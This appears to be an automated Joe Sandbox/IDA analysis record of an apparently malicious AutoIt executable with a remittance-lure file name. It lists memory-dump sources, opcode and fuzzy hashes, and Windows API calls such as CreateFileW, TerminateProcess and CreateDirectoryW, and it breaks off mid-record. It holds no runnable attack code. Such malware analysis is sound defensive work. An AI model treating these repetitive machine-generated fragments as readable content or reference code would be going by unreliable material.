                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _strcat
                                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 1765576173-3640349533
                                                                      • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                      • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1794320848-0
                                                                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2429186680-0
                                                                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                      APIs
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                      • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                      • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                      • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 0043214B
                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                      • _malloc.LIBCMT ref: 0043215D
                                                                      • _malloc.LIBCMT ref: 0043216F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 680241177-0
                                                                      • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                      • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                      APIs
                                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 4217535847-0
                                                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                                                                      • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                      • Opcode Fuzzy Hash: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                                                                      • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 004678F7
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__wsplitpath_malloc
                                                                      • String ID:
                                                                      • API String ID: 4163294574-0
                                                                      • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                      • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                      • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                      • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                                      • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                      • Opcode Fuzzy Hash: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                                      • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                      APIs
                                                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                      • _strcat.LIBCMT ref: 0040F786
                                                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                      • String ID:
                                                                      • API String ID: 3199840319-0
                                                                      • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                      • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FreeInfoLibraryParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3403648963-0
                                                                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                      • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                      • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                      • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                      APIs
                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                      • __lock_file.LIBCMT ref: 00414A8D
                                                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                      • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                      • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                      • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 00415012
                                                                      • __ftell_nolock.LIBCMT ref: 0041501F
                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2999321469-0
                                                                      • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                      • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                      • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                      • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                      APIs
                                                                        • Part of subcall function 03EC2D50: GetFileAttributesW.KERNELBASE(?), ref: 03EC2D5B
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 03EC360F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesCreateDirectoryFile
                                                                      • String ID:
                                                                      • API String ID: 3401506121-0
                                                                      • Opcode ID: 03fc0fe4d1d363b5bcaae60523602935eda57b3942cc4ea03ef92dbbedc34ea2
                                                                      • Instruction ID: 11b8e58d9e29c13bdd73a003fd16119ad75d2b6593e2f202b58a6a0238fe364e
                                                                      • Opcode Fuzzy Hash: 03fc0fe4d1d363b5bcaae60523602935eda57b3942cc4ea03ef92dbbedc34ea2
                                                                      • Instruction Fuzzy Hash: 4C51C835A2024D97DF14EFB0C954BEF7339EF58300F0095A9A609E7280EB79AB45CB65
                                                                      APIs
                                                                      Memory Dump Source
